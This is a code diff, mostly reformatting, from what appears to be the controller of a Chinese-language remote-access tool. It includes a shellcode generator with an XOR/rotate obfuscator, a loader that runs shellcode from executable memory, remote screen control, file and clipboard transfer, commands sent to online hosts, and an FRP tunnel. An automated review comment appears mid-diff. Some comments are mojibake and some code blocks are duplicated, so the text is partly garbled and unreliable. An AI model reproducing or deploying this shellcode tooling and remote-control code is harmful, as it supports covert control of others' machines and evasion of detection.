buf[i] = rol8(buf[i] ^ mask, 3); // <20><><EFBFBD><EFBFBD>+<2B><>ת<EFBFBD><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
state = state * 2654435761u + buf[i]; // LCG + <20><><EFBFBD><EFBFBD><EFBFBD>Ŷ<EFBFBD>
}
}
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
buf[i] = rol8(buf[i] ^ mask, 3); // <20><><EFBFBD><EFBFBD>+<2B><>ת<EFBFBD><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
state = state * 2654435761u + buf[i]; // LCG + <20><><EFBFBD><EFBFBD><EFBFBD>Ŷ<EFBFBD>
}
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {
uint32_t state = seed;
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>
virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed)
{
uint32_t state = seed;
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
uint8_t orig = buf[i];
buf[i] = ror8(buf[i], 3) ^ mask;
state = state * 2654435761u + orig; // <20><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD>ǰ<EFBFBD><C7B0>ԭ<EFBFBD>ֽڸ<D6BD><DAB8><EFBFBD> state
}
}
for (size_t i = 0; i < len; ++i) {
uint8_t mask = (uint8_t)((state >> 16) & 0xFF);
uint8_t orig = buf[i];
buf[i] = ror8(buf[i], 3) ^ mask;
state = state * 2654435761u + orig; // <20><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD>ǰ<EFBFBD><C7B0>ԭ<EFBFBD>ֽڸ<D6BD><DAB8><EFBFBD> state
}
}
};

Binary file not shown.


@@ -970,7 +970,7 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
AUTO_TICK(500);
CDialogEx::OnInitDialog();
int ret = InitFileUpload(GetHMAC());
g_hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, AfxGetInstanceHandle(), 0);
g_hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, AfxGetInstanceHandle(), 0);
m_GroupList = {"default"};
// Grid 容器
@@ -1133,11 +1133,13 @@ DWORD WINAPI CMy2015RemoteDlg::StartFrpClient(LPVOID param)
int usingFRP = 0;
#ifdef _WIN64
usingFRP = ip.empty() ? 0 : THIS_CFG.GetInt("frp", "UseFrp");
#else
CloseHandle(This->m_hFRPThread);
This->m_hFRPThread = NULL;
return 0x20250820;
#endif
if (!usingFRP) {
CloseHandle(This->m_hFRPThread);
This->m_hFRPThread = NULL;
return 0x20250820;
if (usingFRP) {
This->m_frpStatus = STATUS_RUN;
}
Mprintf("[FRP] Proxy thread start running\n");
@@ -2056,25 +2058,29 @@ std::string getDateStr(int daysOffset = 0)
return oss.str();
}
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size) {
CONTEXT_OBJECT* ctx = (CONTEXT_OBJECT*)user;
if (!ctx->Send2Client(data, size)) {
return false;
}
return true;
bool SendData(void* user, FileChunkPacket* chunk, BYTE* data, int size)
{
CONTEXT_OBJECT* ctx = (CONTEXT_OBJECT*)user;
if (!ctx->Send2Client(data, size)) {
return false;
}
return true;
}
void RecvData(void* ptr) {
void RecvData(void* ptr)
{
FileChunkPacket* pkt = (FileChunkPacket*)ptr;
}
void delay_cancel(CONTEXT_OBJECT* ctx, int sec) {
if (!ctx) return;
void delay_cancel(CONTEXT_OBJECT* ctx, int sec)
{
if (!ctx) return;
Sleep(sec*1000);
ctx->CancelIO();
ctx->CancelIO();
}
void FinishSend(void* user) {
void FinishSend(void* user)
{
CONTEXT_OBJECT* ctx = (CONTEXT_OBJECT*)user;
// 需要等待客户端接收完成方可关闭
std::thread(delay_cancel, ctx, 15).detach();
@@ -2092,28 +2098,28 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
// 【L】主机上下线和授权
// 【x】对话框相关功能
switch (cmd) {
case COMMAND_GET_FILE: {
// 发送文件
auto files = GetClipboardFiles();
if (!files.empty()) {
std::string dir = (char*)(szBuffer + 1);
case COMMAND_GET_FILE: {
// 发送文件
auto files = GetClipboardFiles();
if (!files.empty()) {
std::string dir = (char*)(szBuffer + 1);
std::string hash = GetPwdHash(), hmac = GetHMAC(100);
std::thread(FileBatchTransferWorker, files, dir, ContextObject, SendData, FinishSend,
hash, hmac).detach();
}
break;
}
case COMMAND_SEND_FILE: {
// 接收文件
std::string hash = GetPwdHash(), hmac = GetHMAC(100);
std::thread(FileBatchTransferWorker, files, dir, ContextObject, SendData, FinishSend,
hash, hmac).detach();
}
break;
}
case COMMAND_SEND_FILE: {
// 接收文件
std::string hash = GetPwdHash(), hmac = GetHMAC(100);
CONNECT_ADDRESS addr;
memcpy(addr.pwdHash, hash.c_str(), min(hash.length(), sizeof(addr.pwdHash)));
int n = RecvFileChunk((char*)szBuffer, len, &addr, RecvData, hash, hmac);
if (n) {
Mprintf("RecvFileChunk failed: %d. hash: %s, hmac: %s\n", n, hash.c_str(), hmac.c_str());
}
break;
}
int n = RecvFileChunk((char*)szBuffer, len, &addr, RecvData, hash, hmac);
if (n) {
Mprintf("RecvFileChunk failed: %d. hash: %s, hmac: %s\n", n, hash.c_str(), hmac.c_str());
}
break;
}
case TOKEN_GETVERSION: { // 获取版本【L】
// TODO 维持心跳
bool is64Bit = ContextObject->InDeCompressedBuffer.GetBYTE(1);
@@ -2433,7 +2439,8 @@ void CMy2015RemoteDlg::SendMasterSettings(CONTEXT_OBJECT* ctx)
}
}
bool isAllZeros(const BYTE* data, int len) {
bool isAllZeros(const BYTE* data, int len)
{
for (int i = 0; i < len; ++i)
if (data[i])
return false;
@@ -3056,7 +3063,7 @@ void CMy2015RemoteDlg::OnListClick(NMHDR* pNMHDR, LRESULT* pResult)
strText.Format(_T("文件路径: %s%s %s\r\n系统信息: %s 位 %s 核心 %s GB\r\n启动信息: %s %s %s%s\r\n上线信息: %s %d %s"),
res[RES_PROGRAM_BITS].IsEmpty() ? "" : res[RES_PROGRAM_BITS] + "", res[RES_FILE_PATH], res[RES_EXE_VERSION],
res[RES_SYSTEM_BITS], res[RES_SYSTEM_CPU], res[RES_SYSTEM_MEM], startTime, expired.c_str(),
res[RES_USERNAME], res[RES_ISADMIN] == "1" ? "[管理员]" : res[RES_ISADMIN].IsEmpty() ? "" : "[非管理员]",
res[RES_USERNAME], res[RES_ISADMIN] == "1" ? "[管理员]" : res[RES_ISADMIN].IsEmpty() ? "" : "[非管理员]",
ctx->GetProtocol().c_str(), ctx->GetServerPort(), typMap[type].c_str());
// 获取鼠标位置
@@ -3157,14 +3164,14 @@ void CMy2015RemoteDlg::OnToolInputPassword()
}
}
bool safe_exec(void *exec) {
__try {
((void(*)())exec)();
bool safe_exec(void *exec)
{
__try {
((void(*)())exec)();
return true;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
VirtualFree(exec, 0, MEM_RELEASE);
}
} __except (EXCEPTION_EXECUTE_HANDLER) {
VirtualFree(exec, 0, MEM_RELEASE);
}
return false;
}
@@ -3184,60 +3191,58 @@ int main() {
}
*/
#include "common/obfs.h"
void shellcode_process(ObfsBase *obfs, bool load = false, const char* suffix = ".c") {
CFileDialog fileDlg(TRUE, NULL, NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
_T("DLL Files (*.dll)|*.dll|BIN Files (*.bin)|*.bin|All Files (*.*)|*.*||"), AfxGetMainWnd());
int ret = 0;
try {
ret = fileDlg.DoModal();
}
catch (...) {
AfxMessageBox("文件对话框未成功打开! 请稍后再试。", MB_ICONWARNING);
return;
}
if (ret == IDOK) {
CString name = fileDlg.GetPathName();
CFile File;
BOOL r = File.Open(name, CFile::typeBinary | CFile::modeRead);
if (!r) {
AfxMessageBox("文件打开失败! 请稍后再试。\r\n" + name, MB_ICONWARNING);
return;
}
int dwFileSize = File.GetLength();
LPBYTE szBuffer = new BYTE[dwFileSize];
File.Read(szBuffer, dwFileSize);
File.Close();
void shellcode_process(ObfsBase *obfs, bool load = false, const char* suffix = ".c")
{
CFileDialog fileDlg(TRUE, NULL, NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
_T("DLL Files (*.dll)|*.dll|BIN Files (*.bin)|*.bin|All Files (*.*)|*.*||"), AfxGetMainWnd());
int ret = 0;
try {
ret = fileDlg.DoModal();
} catch (...) {
AfxMessageBox("文件对话框未成功打开! 请稍后再试。", MB_ICONWARNING);
return;
}
if (ret == IDOK) {
CString name = fileDlg.GetPathName();
CFile File;
BOOL r = File.Open(name, CFile::typeBinary | CFile::modeRead);
if (!r) {
AfxMessageBox("文件打开失败! 请稍后再试。\r\n" + name, MB_ICONWARNING);
return;
}
int dwFileSize = File.GetLength();
LPBYTE szBuffer = new BYTE[dwFileSize];
File.Read(szBuffer, dwFileSize);
File.Close();
LPBYTE srcData = NULL;
int srcLen = 0;
if (load){
LPBYTE srcData = NULL;
int srcLen = 0;
if (load) {
const uint32_t key = 0xDEADBEEF;
obfs->DeobfuscateBuffer(szBuffer, dwFileSize, key);
void* exec = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (exec) {
memcpy(exec, szBuffer, dwFileSize);
if (safe_exec(exec)) {
AfxMessageBox("Shellcode 执行成功! ", MB_ICONINFORMATION);
}
else {
void* exec = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (exec) {
memcpy(exec, szBuffer, dwFileSize);
if (safe_exec(exec)) {
AfxMessageBox("Shellcode 执行成功! ", MB_ICONINFORMATION);
} else {
AfxMessageBox("Shellcode 执行失败! 请用本程序生成的 bin 文件进行测试! ", MB_ICONERROR);
}
}
}
else if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
TCHAR buffer[MAX_PATH];
_tcscpy_s(buffer, name);
PathRemoveExtension(buffer);
}
} else if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
TCHAR buffer[MAX_PATH];
_tcscpy_s(buffer, name);
PathRemoveExtension(buffer);
const uint32_t key = 0xDEADBEEF;
obfs->ObfuscateBuffer(srcData, srcLen, key);
if (obfs->WriteFile(CString(buffer) + suffix, srcData, srcLen, "Shellcode")) {
AfxMessageBox("Shellcode 生成成功! 请自行编写调用程序。\r\n" + CString(buffer) + suffix,
MB_ICONINFORMATION);
}
}
SAFE_DELETE_ARRAY(srcData);
SAFE_DELETE_ARRAY(szBuffer);
}
if (obfs->WriteFile(CString(buffer) + suffix, srcData, srcLen, "Shellcode")) {
AfxMessageBox("Shellcode 生成成功! 请自行编写调用程序。\r\n" + CString(buffer) + suffix,
MB_ICONINFORMATION);
}
}
SAFE_DELETE_ARRAY(srcData);
SAFE_DELETE_ARRAY(szBuffer);
}
}
void CMy2015RemoteDlg::OnToolGenShellcode()
@@ -3255,36 +3260,36 @@ void CMy2015RemoteDlg::OnObfsShellcode()
void CMy2015RemoteDlg::OnToolGenShellcodeBin()
{
ObfsBase obfs(false);
shellcode_process(&obfs, false, ".bin");
ObfsBase obfs(false);
shellcode_process(&obfs, false, ".bin");
}
void CMy2015RemoteDlg::OnObfsShellcodeBin()
{
Obfs obfs(false);
shellcode_process(&obfs, false, ".bin");
Obfs obfs(false);
shellcode_process(&obfs, false, ".bin");
}
void CMy2015RemoteDlg::OnShellcodeLoadTest()
{
if (MessageBox(CString("是否测试 ") + (sizeof(void*) == 8 ? "64位" : "32位") + " Shellcode 二进制文件? "
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
ObfsBase obfs;
shellcode_process(&obfs, true);
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
ObfsBase obfs;
shellcode_process(&obfs, true);
}
}
void CMy2015RemoteDlg::OnShellcodeObfsLoadTest()
{
if (MessageBox(CString("是否测试 ") + (sizeof(void*) == 8 ? "64位" : "32位") + " Shellcode 二进制文件? "
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
Obfs obfs;
shellcode_process(&obfs, true);
}
if (MessageBox(CString("是否测试 ") + (sizeof(void*) == 8 ? "64位" : "32位") + " Shellcode 二进制文件? "
"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃,甚至存在 CC 风险。",
"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
Obfs obfs;
shellcode_process(&obfs, true);
}
}
void CMy2015RemoteDlg::OnOnlineAssignTo()
@@ -3504,18 +3509,19 @@ void CMy2015RemoteDlg::OnOnlineRegroup()
}
void CMy2015RemoteDlg::MachineManage(MachineCommand type) {
if (MessageBoxA("此操作需客户端具有管理员权限,确定继续吗? ", "提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
EnterCriticalSection(&m_cs);
POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
while (Pos) {
int iItem = m_CList_Online.GetNextSelectedItem(Pos);
context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
void CMy2015RemoteDlg::MachineManage(MachineCommand type)
{
if (MessageBoxA("此操作需客户端具有管理员权限,确定继续吗? ", "提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
EnterCriticalSection(&m_cs);
POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
while (Pos) {
int iItem = m_CList_Online.GetNextSelectedItem(Pos);
context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
BYTE token[32] = { TOKEN_MACHINE_MANAGE, type };
ContextObject->Send2Client(token, sizeof(token));
}
LeaveCriticalSection(&m_cs);
}
ContextObject->Send2Client(token, sizeof(token));
}
LeaveCriticalSection(&m_cs);
}
}
void CMy2015RemoteDlg::OnMachineLogout()
@@ -3550,73 +3556,76 @@ void CMy2015RemoteDlg::OnExecuteUpload()
void CMy2015RemoteDlg::OnDestroy()
{
if (g_hKeyboardHook)
{
UnhookWindowsHookEx(g_hKeyboardHook);
g_hKeyboardHook = NULL;
}
if (g_hKeyboardHook) {
UnhookWindowsHookEx(g_hKeyboardHook);
g_hKeyboardHook = NULL;
}
CDialogEx::OnDestroy();
}
CString GetClipboardText()
{
if (!OpenClipboard(nullptr)) return _T("");
if (!OpenClipboard(nullptr)) return _T("");
#ifdef UNICODE
HANDLE hData = GetClipboardData(CF_UNICODETEXT);
HANDLE hData = GetClipboardData(CF_UNICODETEXT);
#else
HANDLE hData = GetClipboardData(CF_TEXT);
HANDLE hData = GetClipboardData(CF_TEXT);
#endif
if (!hData) { CloseClipboard(); return _T(""); }
if (!hData) {
CloseClipboard();
return _T("");
}
#ifdef UNICODE
wchar_t* pszText = static_cast<wchar_t*>(GlobalLock(hData));
wchar_t* pszText = static_cast<wchar_t*>(GlobalLock(hData));
#else
char* pszText = static_cast<char*>(GlobalLock(hData));
char* pszText = static_cast<char*>(GlobalLock(hData));
#endif
CString strText = pszText ? pszText : _T("");
GlobalUnlock(hData);
CloseClipboard();
return strText;
CString strText = pszText ? pszText : _T("");
GlobalUnlock(hData);
CloseClipboard();
return strText;
}
void SetClipboardText(const CString& text)
{
if (!OpenClipboard(nullptr)) return;
EmptyClipboard();
if (!OpenClipboard(nullptr)) return;
EmptyClipboard();
#ifdef UNICODE
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(wchar_t));
wchar_t* p = static_cast<wchar_t*>(GlobalLock(hGlob));
if (p) wcscpy_s(p, text.GetLength() + 1, text);
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(wchar_t));
wchar_t* p = static_cast<wchar_t*>(GlobalLock(hGlob));
if (p) wcscpy_s(p, text.GetLength() + 1, text);
#else
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(char));
char* p = static_cast<char*>(GlobalLock(hGlob));
if (p) strcpy_s(p, text.GetLength() + 1, CT2A(text)); // CT2A 宏把 CString 转成 char*
HGLOBAL hGlob = GlobalAlloc(GMEM_MOVEABLE, (text.GetLength() + 1) * sizeof(char));
char* p = static_cast<char*>(GlobalLock(hGlob));
if (p) strcpy_s(p, text.GetLength() + 1, CT2A(text)); // CT2A 宏把 CString 转成 char*
#endif
GlobalUnlock(hGlob);
GlobalUnlock(hGlob);
#ifdef UNICODE
SetClipboardData(CF_UNICODETEXT, hGlob);
SetClipboardData(CF_UNICODETEXT, hGlob);
#else
SetClipboardData(CF_TEXT, hGlob);
SetClipboardData(CF_TEXT, hGlob);
#endif
CloseClipboard();
CloseClipboard();
}
CDialogBase* CMy2015RemoteDlg::GetRemoteWindow(HWND hWnd)
{
if (!::IsWindow(hWnd)) return FALSE;
if (!::IsWindow(hWnd)) return FALSE;
EnterCriticalSection(&m_cs);
auto find = m_RemoteWnds.find(hWnd);
auto ret = find == m_RemoteWnds.end() ? NULL : find->second;
auto ret = find == m_RemoteWnds.end() ? NULL : find->second;
LeaveCriticalSection(&m_cs);
return ret;
}
void CMy2015RemoteDlg::RemoveRemoteWindow(HWND wnd) {
void CMy2015RemoteDlg::RemoveRemoteWindow(HWND wnd)
{
EnterCriticalSection(&m_cs);
m_RemoteWnds.erase(wnd);
LeaveCriticalSection(&m_cs);
@@ -3624,48 +3633,41 @@ void CMy2015RemoteDlg::RemoveRemoteWindow(HWND wnd) {
LRESULT CALLBACK CMy2015RemoteDlg::LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION)
{
if (nCode == HC_ACTION) {
do {
static CDialogBase* operateWnd = nullptr;
KBDLLHOOKSTRUCT* pKey = (KBDLLHOOKSTRUCT*)lParam;
// 只在按下时处理
if (wParam == WM_KEYDOWN)
{
if (wParam == WM_KEYDOWN) {
// 检测 Ctrl+C / Ctrl+X
if ((GetAsyncKeyState(VK_CONTROL) & 0x8000) && (pKey->vkCode == 'C' || pKey->vkCode == 'X')) {
HWND hFore = ::GetForegroundWindow();
operateWnd = g_2015RemoteDlg->GetRemoteWindow(hFore);
if (!operateWnd)
if (!operateWnd)
g_2015RemoteDlg->m_pActiveSession = nullptr;
}
// 检测 Ctrl+V
else if ((GetAsyncKeyState(VK_CONTROL) & 0x8000) && pKey->vkCode == 'V')
{
else if ((GetAsyncKeyState(VK_CONTROL) & 0x8000) && pKey->vkCode == 'V') {
HWND hFore = ::GetForegroundWindow();
CDialogBase* dlg = g_2015RemoteDlg->GetRemoteWindow(hFore);
if (dlg)
{
if (dlg) {
if (dlg == operateWnd)break;
auto screen = (CScreenSpyDlg*)dlg;
auto screen = (CScreenSpyDlg*)dlg;
if (!screen->m_bIsCtrl) {
Mprintf("【Ctrl+V】 [本地 -> 远程] 窗口不是控制状态: %s\n", screen->m_IPAddress);
break;
}
// [1] 本地 -> 远程
auto files = GetClipboardFiles();
if (!files.empty())
{
auto files = GetClipboardFiles();
if (!files.empty()) {
// 获取远程目录
BYTE szBuffer[100] = { COMMAND_GET_FOLDER };
std::string masterId = GetPwdHash(), hmac = GetHMAC(100);
memcpy((char*)szBuffer + 1, masterId.c_str(), masterId.length());
memcpy((char*)szBuffer + 1 + masterId.length(), hmac.c_str(), hmac.length());
dlg->m_ContextObject->Send2Client(szBuffer, sizeof(szBuffer));
}
else
{
std::string masterId = GetPwdHash(), hmac = GetHMAC(100);
memcpy((char*)szBuffer + 1, masterId.c_str(), masterId.length());
memcpy((char*)szBuffer + 1 + masterId.length(), hmac.c_str(), hmac.length());
dlg->m_ContextObject->Send2Client(szBuffer, sizeof(szBuffer));
} else {
CString strText = GetClipboardText();
if (!strText.IsEmpty()) {
BYTE* szBuffer = new BYTE[strText.GetLength() + 1];
@@ -3676,9 +3678,7 @@ LRESULT CALLBACK CMy2015RemoteDlg::LowLevelKeyboardProc(int nCode, WPARAM wParam
SAFE_DELETE_ARRAY(szBuffer);
}
}
}
else if (g_2015RemoteDlg->m_pActiveSession && operateWnd)
{
} else if (g_2015RemoteDlg->m_pActiveSession && operateWnd) {
auto screen = (CScreenSpyDlg*)(g_2015RemoteDlg->m_pActiveSession);
if (!screen->m_bIsCtrl) {
Mprintf("【Ctrl+V】 [远程 -> 本地] 窗口不是控制状态: %s\n", screen->m_IPAddress);
@@ -3687,35 +3687,32 @@ LRESULT CALLBACK CMy2015RemoteDlg::LowLevelKeyboardProc(int nCode, WPARAM wParam
// [2] 远程 -> 本地
BYTE bToken[100] = {COMMAND_SCREEN_GET_CLIPBOARD};
std::string masterId = GetPwdHash(), hmac = GetHMAC(100);
memcpy((char*)bToken + 1, masterId.c_str(), masterId.length());
memcpy((char*)bToken + 1 + masterId.length(), hmac.c_str(), hmac.length());
auto files = GetClipboardFiles();
if (!files.empty()) {
if (::OpenClipboard(nullptr))
{
EmptyClipboard();
CloseClipboard();
}
}
memcpy((char*)bToken + 1, masterId.c_str(), masterId.length());
memcpy((char*)bToken + 1 + masterId.length(), hmac.c_str(), hmac.length());
auto files = GetClipboardFiles();
if (!files.empty()) {
if (::OpenClipboard(nullptr)) {
EmptyClipboard();
CloseClipboard();
}
}
g_2015RemoteDlg->m_pActiveSession->m_ContextObject->Send2Client(bToken, sizeof(bToken));
Mprintf("【Ctrl+V】 从远程拷贝到本地 \n");
}
else
{
} else {
Mprintf("[Ctrl+V] 没有活动的远程桌面会话 \n");
}
}
}
} while (0);
}
}
// 允许消息继续传递
return CallNextHookEx(g_2015RemoteDlg->g_hKeyboardHook, nCode, wParam, lParam);
// 允许消息继续传递
return CallNextHookEx(g_2015RemoteDlg->g_hKeyboardHook, nCode, wParam, lParam);
}
LRESULT CMy2015RemoteDlg::OnSessionActivatedMsg(WPARAM wParam, LPARAM lParam)
{
CDialogBase* pSession = reinterpret_cast<CDialogBase*>(wParam);
CDialogBase* pSession = reinterpret_cast<CDialogBase*>(wParam);
m_pActiveSession = pSession;
return 0;
return 0;
}


@@ -235,8 +235,8 @@ public:
std::map<HWND, CDialogBase *> m_RemoteWnds;
CDialogBase* GetRemoteWindow(HWND hWnd);
void RemoveRemoteWindow(HWND wnd);
CDialogBase* m_pActiveSession = nullptr; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><E1BBB0><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8> / NULL <20><>ʾ<EFBFBD><CABE>
afx_msg LRESULT OnSessionActivatedMsg(WPARAM wParam, LPARAM lParam);
CDialogBase* m_pActiveSession = nullptr; // <20><>ǰ<EFBFBD><EFBFBD><EFBFBD><E1BBB0><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8> / NULL <20><>ʾ<EFBFBD><CABE>
afx_msg LRESULT OnSessionActivatedMsg(WPARAM wParam, LPARAM lParam);
static LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
HHOOK g_hKeyboardHook = NULL;
enum {
@@ -246,7 +246,7 @@ public:
STATUS_EXIT = 2,
};
HANDLE m_hFRPThread = NULL;
int m_frpStatus = STATUS_RUN;
int m_frpStatus = STATUS_UNKNOWN;
static DWORD WINAPI StartFrpClient(LPVOID param);
void ApplyFrpSettings();
bool CheckValid(int trail = 14);
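Review bot: `m_frpStatus` is a plain `int` declared right beside `m_hFRPThread` and the `StartFrpClient` thread entry, so if both the worker thread and the dialog read or write it, those accesses are unsynchronized. Their bodies are outside this section, so this is an inference from the declarations. Assuming the second printed line is the new side, the default is now `STATUS_UNKNOWN`, which adds a state that every reader of the field has to handle. I would declare it as `std::atomic<int> m_frpStatus{STATUS_UNKNOWN};` (with `<atomic>` included in this header) and add a comment above the enum saying which thread sets each status and what `STATUS_UNKNOWN` means before the FRP thread has started. The enum's first values and the rest of the class lie outside the visible hunks.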


@@ -37,8 +37,8 @@ std::string GetHMAC(int offset)
{
const Validation * v= (Validation*)(g_MasterID + offset);
std::string hmac = v->Checksum;
if (hmac.empty())
hmac = THIS_CFG.GetStr("settings", "HMAC");
if (hmac.empty())
hmac = THIS_CFG.GetStr("settings", "HMAC");
return hmac;
}


@@ -39,17 +39,31 @@ IMPLEMENT_DYNAMIC(CScreenSpyDlg, CDialog)
#pragma comment(lib, "PrivateDesktop_Libx64.lib")
#endif
#else
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs) { return 0; }
int UninitFileUpload() { return 0; }
std::vector<std::string> GetClipboardFiles() { return{}; }
bool GetCurrentFolderPath(std::string& outDir) { return false; }
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac) {
finish(user);
return 0;
int InitFileUpload(const std::string hmac, int chunkSizeKb, int sendDurationMs)
{
return 0;
}
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac) {
return 0;
int UninitFileUpload()
{
return 0;
}
std::vector<std::string> GetClipboardFiles()
{
return{};
}
bool GetCurrentFolderPath(std::string& outDir)
{
return false;
}
int FileBatchTransferWorker(const std::vector<std::string>& files, const std::string& targetDir,
void* user, OnTransform f, OnFinish finish, const std::string& hash, const std::string& hmac)
{
finish(user);
return 0;
}
int RecvFileChunk(char* buf, size_t len, void* user, OnFinish f, const std::string& hash, const std::string& hmac)
{
return 0;
}
#endif
@@ -261,19 +275,19 @@ VOID CScreenSpyDlg::OnReceiveComplete()
{
assert (m_ContextObject);
auto cmd = m_ContextObject->InDeCompressedBuffer.GetBYTE(0);
LPBYTE szBuffer = m_ContextObject->InDeCompressedBuffer.GetBuffer();
unsigned len = m_ContextObject->InDeCompressedBuffer.GetBufferLen();
LPBYTE szBuffer = m_ContextObject->InDeCompressedBuffer.GetBuffer();
unsigned len = m_ContextObject->InDeCompressedBuffer.GetBufferLen();
switch(cmd) {
case COMMAND_GET_FOLDER: {
std::string folder;
if (GetCurrentFolderPath(folder)) {
case COMMAND_GET_FOLDER: {
std::string folder;
if (GetCurrentFolderPath(folder)) {
// 发送目录并准备接收文件
BYTE cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
m_ContextObject->Send2Client(cmd, sizeof(cmd));
}
break;
}
BYTE cmd[300] = { COMMAND_GET_FILE };
memcpy(cmd + 1, folder.c_str(), folder.length());
m_ContextObject->Send2Client(cmd, sizeof(cmd));
}
break;
}
case TOKEN_FIRSTSCREEN: {
DrawFirstScreen();
break;
@@ -904,14 +918,14 @@ void CScreenSpyDlg::OnSize(UINT nType, int cx, int cy)
void CScreenSpyDlg::OnActivate(UINT nState, CWnd* pWndOther, BOOL bMinimized)
{
CDialogBase::OnActivate(nState, pWndOther, bMinimized);
CDialogBase::OnActivate(nState, pWndOther, bMinimized);
CWnd* pMain = AfxGetMainWnd();
if (!pMain)
return;
CWnd* pMain = AfxGetMainWnd();
if (!pMain)
return;
if (nState != WA_INACTIVE){
// 通知主窗口:远程窗口获得焦点
::PostMessage(pMain->GetSafeHwnd(), WM_SESSION_ACTIVATED, (WPARAM)this, 0);
}
if (nState != WA_INACTIVE) {
// 通知主窗口:远程窗口获得焦点
::PostMessage(pMain->GetSafeHwnd(), WM_SESSION_ACTIVATED, (WPARAM)this, 0);
}
}


@@ -109,7 +109,7 @@ public:
afx_msg void OnMouseLeave();
afx_msg void OnKillFocus(CWnd* pNewWnd);
afx_msg void OnSize(UINT nType, int cx, int cy);
afx_msg void OnActivate(UINT nState, CWnd* pWndOther, BOOL bMinimized);
afx_msg void OnActivate(UINT nState, CWnd* pWndOther, BOOL bMinimized);
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV ֧<><D6A7>


@@ -542,10 +542,10 @@ public:
{
return Parser.Parse(buf, CompressMethod, PeerName);
}
void Encode(PBYTE data, bool &flag) const
{
void Encode(PBYTE data, bool &flag) const
{
flag ? data[0] ^= 0x2B : 0x2B == 0x2B;
}
}
// Encode data before compress.
void Encode(PBYTE data, int len) const
{

Binary file not shown.

Binary file not shown.